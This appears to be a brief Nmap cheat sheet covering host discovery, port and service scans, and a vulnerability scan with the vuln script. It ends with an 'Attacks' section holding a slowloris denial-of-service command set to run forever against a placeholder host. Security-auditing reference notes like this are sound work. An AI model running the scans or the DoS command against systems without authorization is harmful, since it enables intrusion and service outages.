NMap

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.

General Syntax

nmap [flags] host(s)

Host Discovery

ping_scan.sh

# Find what hosts are up.  Light reconnaissance without attracting much attention.
nmap -sn 192.168.1.0/24

Ports

Flags

-p # Specify a single port, multiple ports (separated by a comma) or a port range (for example 20-25).
-p- # All possible ports
-top-ports x # Most common x ports

Commands

port_scan.sh

# Scan a range of ports.
nmap -p 1-65535 192.168.1.0

Services

service_detection.sh

nmap -sV localhost

Vulnerabilities

vulnerabilities.sh

# Scan for known CVEs
nmap -Pn -script vuln 192.168.1.105

Attacks

attacks.sh

# DOS Attack
nmap -p 80 -max-parallelism 800 -Pn -script http-slowloris -script-args http-slowloris.runforever=true X.X.X.X

Welcome Acme SSL